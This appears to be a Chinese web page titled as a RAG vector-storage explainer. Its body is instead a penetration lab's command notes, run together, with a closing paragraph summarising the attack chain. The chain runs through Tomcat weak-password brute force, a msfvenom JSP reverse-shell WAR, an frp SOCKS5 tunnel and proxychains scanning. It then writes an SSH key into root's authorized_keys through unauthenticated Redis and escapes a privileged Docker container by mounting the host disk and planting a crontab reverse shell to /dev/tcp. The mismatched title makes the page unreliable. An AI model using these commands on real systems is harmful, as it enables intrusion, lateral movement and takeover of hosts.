RAG向量存储原理(余弦相似度、欧氏距离、ANN近似最近邻、HNSW原理、混合检索)
2026/5/15 8:56:05
这是我的现有靶场信息
# 拉取镜像 docker pull redis:latest # 特权模式启动(模拟真实可写文件场景) docker run -d --name target-redis --privileged -p 6380:6379 -v /tmp:/data redis:latest redis-server --protected-mode no # 验证启动 docker ps | grep redisredis-cli -h 127.0.0.1 -p 6380 info keys * config set dir /data config set dbfilename authorized_keys exitsudo ~/tools/fscan -h 172.17.0.0/24 -np #使用自己的工具路径sudo ~/tools/fscan -h 172.17.0.0/24 -p 1-65535sudo ~/tools/fscan -h 172.17.0.0/24 -p 8080 -user tomcat,admin -pwd tomcat,admin,123456 #弱口令爆破# 生成WAR包(用msfvenom或手动) msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPORT=4444 -f war -o shell.war # 登录Tomcat管理后台上传WAR # http://target:8080/manager/html # 部署shell.war # 蚁剑连接 # http://target:8080/shell/[common] bind_port = 7000./frps -c frps.ini #启动服务端[common] server_addr = 服务端IP server_port = 7000 [plugin_socks5] type = tcp remote_port = 1080 plugin = socks5sudo nano /etc/proxychains4.conf # 最后一行改为: socks5 127.0.0.1 1080# 扫描内网存活主机 sudo proxychains nmap -sT -Pn 172.17.0.0/24 -p 22,80,3306,6379 # 扫描Redis sudo proxychains nmap -sT -Pn 172.17.0.1 -p 6379 -sVssh-keygen -t rsa -C "redis-shell" -f ~/.ssh/redis_shell # 一路回车# 准备公钥内容 (echo -e "\n\n"; cat ~/.ssh/redis_shell.pub; echo -e "\n\n") > /tmp/redis_key.txt # 连接Redis redis-cli -h 172.17.0.1 -p 6379 # 写入公钥 flushall config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD... redis-shell\n\n" save exitssh -i ~/.ssh/redis_shell root@172.17.0.1 whoamicat /proc/1/cgroup | grep docker ls -la /.dockerenv# 查看磁盘 fdisk -l # 挂载宿主机根目录 mkdir /host mount /dev/sda1 /host # 写入宿主机crontab echo '* * * * * bash -i >& /dev/tcp/攻击IP/4444 0>&1' >> /host/var/spool/cron/crontabs/root外网信息收集发现薄弱入口,通过Tomcat弱口令或漏洞获取跳板机权限,搭建frp SOCKS5隧道打通内网通道,利用proxychains代理扫描发现内网Redis未授权访问,写入SSH公钥实现横向移动,最后通过Docker特权模式挂载宿主机磁盘完成逃逸,最终获取宿主机root权限和核心资产访问权。